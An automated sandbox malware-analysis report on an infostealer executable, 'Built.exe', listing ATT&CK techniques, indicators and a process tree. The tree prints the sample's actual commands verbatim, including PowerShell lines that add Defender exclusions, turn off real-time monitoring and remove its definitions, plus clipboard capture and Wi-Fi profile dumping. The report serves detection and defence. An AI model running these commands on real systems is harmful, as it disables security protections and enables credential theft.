96e98920be4b133b4c8a2cb57f2b2ae44b9ec7a3f4e8769f736907f49226e026

Analysis

max time kernel
181s
max time network
157s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
24-11-2024 22:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

7.2MB
MD5

4da65bec2ce207130170ea9352ad66c8
SHA1

05d19acc39ecc3ae54b4a930703fa1d16bcf0f3e
SHA256

96e98920be4b133b4c8a2cb57f2b2ae44b9ec7a3f4e8769f736907f49226e026
SHA512

8de26007574464b7b5c5e202b057f36d248309561755070142b575b26e7ea16a91d705254817142a0d9badb2209ae843aa29b96c2300be3610c8c1e6d59e2b8f
SSDEEP

196608:LBumWx+r5OjmFwDRxtYSHdK34kdai7bN3mYeWaOIgms:4bK2pM9B3QMuts

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
844	powershell.exe
2716	powershell.exe
3068	powershell.exe
3828	powershell.exe
536	powershell.exe
2696	powershell.exe
5084	powershell.exe
2564	powershell.exe
2428	powershell.exe
1496	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
660	powershell.exe
3796	cmd.exe
2628	powershell.exe
760	cmd.exe

Executes dropped EXE 4 IoCs

pid	Process
4416	rar.exe
3604	Built.exe
3820	Built.exe
4520	rar.exe

Loads dropped DLL 34 IoCs

pid	Process
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
1080	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe
3820	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
1	discord.com
5	discord.com
7	discord.com
32	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
7	ip-api.com
10	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 10 IoCs

discovery

Process Discovery

T1057

pid	Process
2952	tasklist.exe
1156	tasklist.exe
1868	tasklist.exe
3056	tasklist.exe
4636	tasklist.exe
1360	tasklist.exe
404	tasklist.exe
1112	tasklist.exe
3392	tasklist.exe
724	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ac38-66.dat	upx
behavioral1/memory/1080-70-0x00007FFD85640000-0x00007FFD85AA6000-memory.dmp	upx
behavioral1/files/0x001900000002ac34-74.dat	upx
behavioral1/memory/1080-77-0x00007FFDA0740000-0x00007FFDA074F000-memory.dmp	upx
behavioral1/files/0x001900000002abed-130.dat	upx
behavioral1/files/0x001900000002abec-129.dat	upx
behavioral1/files/0x001a00000002abea-128.dat	upx
behavioral1/files/0x001c00000002ac40-127.dat	upx
behavioral1/files/0x001000000002ac3c-126.dat	upx
behavioral1/files/0x001b00000002ac3b-125.dat	upx
behavioral1/files/0x001900000002ac35-122.dat	upx
behavioral1/files/0x001c00000002ac33-121.dat	upx
behavioral1/memory/1080-76-0x00007FFD972A0000-0x00007FFD972C4000-memory.dmp	upx
behavioral1/files/0x001900000002abeb-73.dat	upx
behavioral1/memory/1080-135-0x00007FFD97270000-0x00007FFD9729C000-memory.dmp	upx
behavioral1/memory/1080-136-0x00007FFD9C660000-0x00007FFD9C678000-memory.dmp	upx
behavioral1/memory/1080-137-0x00007FFD9BF60000-0x00007FFD9BF7F000-memory.dmp	upx
behavioral1/memory/1080-138-0x00007FFD850F0000-0x00007FFD8526A000-memory.dmp	upx
behavioral1/memory/1080-140-0x00007FFD97260000-0x00007FFD9726D000-memory.dmp	upx
behavioral1/memory/1080-139-0x00007FFD975A0000-0x00007FFD975B9000-memory.dmp	upx
behavioral1/memory/1080-142-0x00007FFD96E10000-0x00007FFD96E3E000-memory.dmp	upx
behavioral1/memory/1080-141-0x00007FFD85640000-0x00007FFD85AA6000-memory.dmp	upx
behavioral1/memory/1080-144-0x00007FFD96220000-0x00007FFD962D8000-memory.dmp	upx
behavioral1/memory/1080-145-0x00007FFD972A0000-0x00007FFD972C4000-memory.dmp	upx
behavioral1/memory/1080-143-0x00007FFD84D70000-0x00007FFD850E9000-memory.dmp	upx
behavioral1/memory/1080-146-0x00007FFD96A90000-0x00007FFD96AA5000-memory.dmp	upx
behavioral1/memory/1080-148-0x00007FFD96FD0000-0x00007FFD96FDD000-memory.dmp	upx
behavioral1/memory/1080-147-0x00007FFD97270000-0x00007FFD9729C000-memory.dmp	upx
behavioral1/memory/1080-149-0x00007FFD9C660000-0x00007FFD9C678000-memory.dmp	upx
behavioral1/memory/1080-150-0x00007FFD84A80000-0x00007FFD84B98000-memory.dmp	upx
behavioral1/memory/1080-171-0x00007FFD9BF60000-0x00007FFD9BF7F000-memory.dmp	upx
behavioral1/memory/1080-182-0x00007FFD850F0000-0x00007FFD8526A000-memory.dmp	upx
behavioral1/memory/1080-268-0x00007FFD975A0000-0x00007FFD975B9000-memory.dmp	upx
behavioral1/memory/1080-340-0x00007FFD96E10000-0x00007FFD96E3E000-memory.dmp	upx
behavioral1/memory/1080-343-0x00007FFD84D70000-0x00007FFD850E9000-memory.dmp	upx
behavioral1/memory/1080-344-0x00007FFD96220000-0x00007FFD962D8000-memory.dmp	upx
behavioral1/memory/1080-363-0x00007FFD85640000-0x00007FFD85AA6000-memory.dmp	upx
behavioral1/memory/1080-369-0x00007FFD850F0000-0x00007FFD8526A000-memory.dmp	upx
behavioral1/memory/1080-368-0x00007FFD9BF60000-0x00007FFD9BF7F000-memory.dmp	upx
behavioral1/memory/1080-364-0x00007FFD972A0000-0x00007FFD972C4000-memory.dmp	upx
behavioral1/memory/1080-386-0x00007FFD975A0000-0x00007FFD975B9000-memory.dmp	upx
behavioral1/memory/1080-395-0x00007FFD972A0000-0x00007FFD972C4000-memory.dmp	upx
behavioral1/memory/1080-394-0x00007FFDA0740000-0x00007FFDA074F000-memory.dmp	upx
behavioral1/memory/1080-393-0x00007FFD84A80000-0x00007FFD84B98000-memory.dmp	upx
behavioral1/memory/1080-392-0x00007FFD96FD0000-0x00007FFD96FDD000-memory.dmp	upx
behavioral1/memory/1080-391-0x00007FFD96A90000-0x00007FFD96AA5000-memory.dmp	upx
behavioral1/memory/1080-390-0x00007FFD96220000-0x00007FFD962D8000-memory.dmp	upx
behavioral1/memory/1080-388-0x00007FFD96E10000-0x00007FFD96E3E000-memory.dmp	upx
behavioral1/memory/1080-387-0x00007FFD97260000-0x00007FFD9726D000-memory.dmp	upx
behavioral1/memory/1080-385-0x00007FFD850F0000-0x00007FFD8526A000-memory.dmp	upx
behavioral1/memory/1080-389-0x00007FFD84D70000-0x00007FFD850E9000-memory.dmp	upx
behavioral1/memory/1080-399-0x00007FFD9BF60000-0x00007FFD9BF7F000-memory.dmp	upx
behavioral1/memory/1080-398-0x00007FFD9C660000-0x00007FFD9C678000-memory.dmp	upx
behavioral1/memory/1080-397-0x00007FFD97270000-0x00007FFD9729C000-memory.dmp	upx
behavioral1/memory/1080-396-0x00007FFD85640000-0x00007FFD85AA6000-memory.dmp	upx
behavioral1/memory/3820-634-0x00007FFD81D80000-0x00007FFD821E6000-memory.dmp	upx
behavioral1/memory/3820-635-0x00007FFD9B100000-0x00007FFD9B124000-memory.dmp	upx
behavioral1/memory/3820-636-0x00007FFDA0A60000-0x00007FFDA0A6F000-memory.dmp	upx
behavioral1/memory/3820-641-0x00007FFD9A320000-0x00007FFD9A34C000-memory.dmp	upx
behavioral1/memory/3820-642-0x00007FFD9BF60000-0x00007FFD9BF78000-memory.dmp	upx
behavioral1/memory/3820-643-0x00007FFD975A0000-0x00007FFD975BF000-memory.dmp	upx
behavioral1/memory/3820-644-0x00007FFD96620000-0x00007FFD9679A000-memory.dmp	upx
behavioral1/memory/3820-645-0x00007FFD97270000-0x00007FFD97289000-memory.dmp	upx
behavioral1/memory/3820-646-0x00007FFD9F0F0000-0x00007FFD9F0FD000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Built.exe:Zone.Identifier	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1612	cmd.exe
2324	netsh.exe
1652	cmd.exe
1772	netsh.exe

Detects videocard installed 1 TTPs 6 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3132	WMIC.exe
3196	WMIC.exe
2000	WMIC.exe
2304	WMIC.exe
3888	WMIC.exe
1484	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5100	systeminfo.exe
2428	systeminfo.exe

Kills process with taskkill 14 IoCs

evasion

pid	Process
4596	taskkill.exe
4960	taskkill.exe
3444	taskkill.exe
1104	taskkill.exe
4560	taskkill.exe
2056	taskkill.exe
2512	taskkill.exe
3028	taskkill.exe
3308	taskkill.exe
1772	taskkill.exe
2204	taskkill.exe
4068	taskkill.exe
4284	taskkill.exe
1144	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133769594374093350"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Built.exe:Zone.Identifier	chrome.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

pid	Process
5084	powershell.exe
2696	powershell.exe
5084	powershell.exe
2696	powershell.exe
2564	powershell.exe
2564	powershell.exe
3696	powershell.exe
3696	powershell.exe
2628	powershell.exe
2628	powershell.exe
2628	powershell.exe
3696	powershell.exe
844	powershell.exe
844	powershell.exe
4688	powershell.exe
4688	powershell.exe
2716	powershell.exe
2716	powershell.exe
4528	powershell.exe
4528	powershell.exe
1204	chrome.exe
1204	chrome.exe
2428	powershell.exe
2428	powershell.exe
3068	powershell.exe
3068	powershell.exe
3068	powershell.exe
2428	powershell.exe
1496	powershell.exe
1496	powershell.exe
660	powershell.exe
660	powershell.exe
2204	powershell.exe
2204	powershell.exe
660	powershell.exe
2204	powershell.exe
3828	powershell.exe
3828	powershell.exe
2896	powershell.exe
2896	powershell.exe
536	powershell.exe
536	powershell.exe
1892	powershell.exe
1892	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3392	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4736	WMIC.exe
Token: SeSecurityPrivilege	4736	WMIC.exe
Token: SeTakeOwnershipPrivilege	4736	WMIC.exe
Token: SeLoadDriverPrivilege	4736	WMIC.exe
Token: SeSystemProfilePrivilege	4736	WMIC.exe
Token: SeSystemtimePrivilege	4736	WMIC.exe
Token: SeProfSingleProcessPrivilege	4736	WMIC.exe
Token: SeIncBasePriorityPrivilege	4736	WMIC.exe
Token: SeCreatePagefilePrivilege	4736	WMIC.exe
Token: SeBackupPrivilege	4736	WMIC.exe
Token: SeRestorePrivilege	4736	WMIC.exe
Token: SeShutdownPrivilege	4736	WMIC.exe
Token: SeDebugPrivilege	4736	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4736	WMIC.exe
Token: SeRemoteShutdownPrivilege	4736	WMIC.exe
Token: SeUndockPrivilege	4736	WMIC.exe
Token: SeManageVolumePrivilege	4736	WMIC.exe
Token: 33	4736	WMIC.exe
Token: 34	4736	WMIC.exe
Token: 35	4736	WMIC.exe
Token: 36	4736	WMIC.exe
Token: SeDebugPrivilege	5084	powershell.exe
Token: SeIncreaseQuotaPrivilege	4736	WMIC.exe
Token: SeSecurityPrivilege	4736	WMIC.exe
Token: SeTakeOwnershipPrivilege	4736	WMIC.exe
Token: SeLoadDriverPrivilege	4736	WMIC.exe
Token: SeSystemProfilePrivilege	4736	WMIC.exe
Token: SeSystemtimePrivilege	4736	WMIC.exe
Token: SeProfSingleProcessPrivilege	4736	WMIC.exe
Token: SeIncBasePriorityPrivilege	4736	WMIC.exe
Token: SeCreatePagefilePrivilege	4736	WMIC.exe
Token: SeBackupPrivilege	4736	WMIC.exe
Token: SeRestorePrivilege	4736	WMIC.exe
Token: SeShutdownPrivilege	4736	WMIC.exe
Token: SeDebugPrivilege	4736	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4736	WMIC.exe
Token: SeRemoteShutdownPrivilege	4736	WMIC.exe
Token: SeUndockPrivilege	4736	WMIC.exe
Token: SeManageVolumePrivilege	4736	WMIC.exe
Token: 33	4736	WMIC.exe
Token: 34	4736	WMIC.exe
Token: 35	4736	WMIC.exe
Token: 36	4736	WMIC.exe
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeIncreaseQuotaPrivilege	3132	WMIC.exe
Token: SeSecurityPrivilege	3132	WMIC.exe
Token: SeTakeOwnershipPrivilege	3132	WMIC.exe
Token: SeLoadDriverPrivilege	3132	WMIC.exe
Token: SeSystemProfilePrivilege	3132	WMIC.exe
Token: SeSystemtimePrivilege	3132	WMIC.exe
Token: SeProfSingleProcessPrivilege	3132	WMIC.exe
Token: SeIncBasePriorityPrivilege	3132	WMIC.exe
Token: SeCreatePagefilePrivilege	3132	WMIC.exe
Token: SeBackupPrivilege	3132	WMIC.exe
Token: SeRestorePrivilege	3132	WMIC.exe
Token: SeShutdownPrivilege	3132	WMIC.exe
Token: SeDebugPrivilege	3132	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3132	WMIC.exe
Token: SeRemoteShutdownPrivilege	3132	WMIC.exe
Token: SeUndockPrivilege	3132	WMIC.exe
Token: SeManageVolumePrivilege	3132	WMIC.exe
Token: 33	3132	WMIC.exe
Token: 34	3132	WMIC.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe
1204	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2472	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4944 wrote to memory of 1080	4944	Built.exe	79
PID 4944 wrote to memory of 1080	4944	Built.exe	79
PID 1080 wrote to memory of 4068	1080	Built.exe	81
PID 1080 wrote to memory of 4068	1080	Built.exe	81
PID 1080 wrote to memory of 3012	1080	Built.exe	82
PID 1080 wrote to memory of 3012	1080	Built.exe	82
PID 1080 wrote to memory of 4048	1080	Built.exe	85
PID 1080 wrote to memory of 4048	1080	Built.exe	85
PID 1080 wrote to memory of 2488	1080	Built.exe	87
PID 1080 wrote to memory of 2488	1080	Built.exe	87
PID 4048 wrote to memory of 3392	4048	cmd.exe	89
PID 4048 wrote to memory of 3392	4048	cmd.exe	89
PID 3012 wrote to memory of 2696	3012	cmd.exe	90
PID 3012 wrote to memory of 2696	3012	cmd.exe	90
PID 2488 wrote to memory of 4736	2488	cmd.exe	91
PID 2488 wrote to memory of 4736	2488	cmd.exe	91
PID 4068 wrote to memory of 5084	4068	cmd.exe	92
PID 4068 wrote to memory of 5084	4068	cmd.exe	92
PID 1080 wrote to memory of 4704	1080	Built.exe	94
PID 1080 wrote to memory of 4704	1080	Built.exe	94
PID 4704 wrote to memory of 4616	4704	cmd.exe	96
PID 4704 wrote to memory of 4616	4704	cmd.exe	96
PID 1080 wrote to memory of 4376	1080	Built.exe	97
PID 1080 wrote to memory of 4376	1080	Built.exe	97
PID 4376 wrote to memory of 224	4376	cmd.exe	139
PID 4376 wrote to memory of 224	4376	cmd.exe	139
PID 1080 wrote to memory of 2228	1080	Built.exe	100
PID 1080 wrote to memory of 2228	1080	Built.exe	100
PID 2228 wrote to memory of 3132	2228	cmd.exe	102
PID 2228 wrote to memory of 3132	2228	cmd.exe	102
PID 1080 wrote to memory of 5072	1080	Built.exe	143
PID 1080 wrote to memory of 5072	1080	Built.exe	143
PID 5072 wrote to memory of 3196	5072	cmd.exe	105
PID 5072 wrote to memory of 3196	5072	cmd.exe	105
PID 1080 wrote to memory of 1896	1080	Built.exe	106
PID 1080 wrote to memory of 1896	1080	Built.exe	106
PID 1896 wrote to memory of 2564	1896	cmd.exe	108
PID 1896 wrote to memory of 2564	1896	cmd.exe	108
PID 1080 wrote to memory of 2824	1080	Built.exe	109
PID 1080 wrote to memory of 2824	1080	Built.exe	109
PID 1080 wrote to memory of 3688	1080	Built.exe	110
PID 1080 wrote to memory of 3688	1080	Built.exe	110
PID 2824 wrote to memory of 724	2824	cmd.exe	113
PID 2824 wrote to memory of 724	2824	cmd.exe	113
PID 3688 wrote to memory of 3056	3688	cmd.exe	114
PID 3688 wrote to memory of 3056	3688	cmd.exe	114
PID 1080 wrote to memory of 2084	1080	Built.exe	115
PID 1080 wrote to memory of 2084	1080	Built.exe	115
PID 1080 wrote to memory of 3796	1080	Built.exe	117
PID 1080 wrote to memory of 3796	1080	Built.exe	117
PID 1080 wrote to memory of 1228	1080	Built.exe	119
PID 1080 wrote to memory of 1228	1080	Built.exe	119
PID 1080 wrote to memory of 3976	1080	Built.exe	120
PID 1080 wrote to memory of 3976	1080	Built.exe	120
PID 1080 wrote to memory of 684	1080	Built.exe	124
PID 1080 wrote to memory of 684	1080	Built.exe	124
PID 1080 wrote to memory of 1612	1080	Built.exe	123
PID 1080 wrote to memory of 1612	1080	Built.exe	123
PID 1080 wrote to memory of 2240	1080	Built.exe	126
PID 1080 wrote to memory of 2240	1080	Built.exe	126
PID 2084 wrote to memory of 3972	2084	cmd.exe	127
PID 2084 wrote to memory of 3972	2084	cmd.exe	127
PID 1080 wrote to memory of 4784	1080	Built.exe	129
PID 1080 wrote to memory of 4784	1080	Built.exe	129

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5072	attrib.exe
652	attrib.exe
4812	attrib.exe
2076	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4944
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4048
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4704
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4376
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2228
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5072
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2824
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3688
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2084
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3796
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1228
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3976
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1612
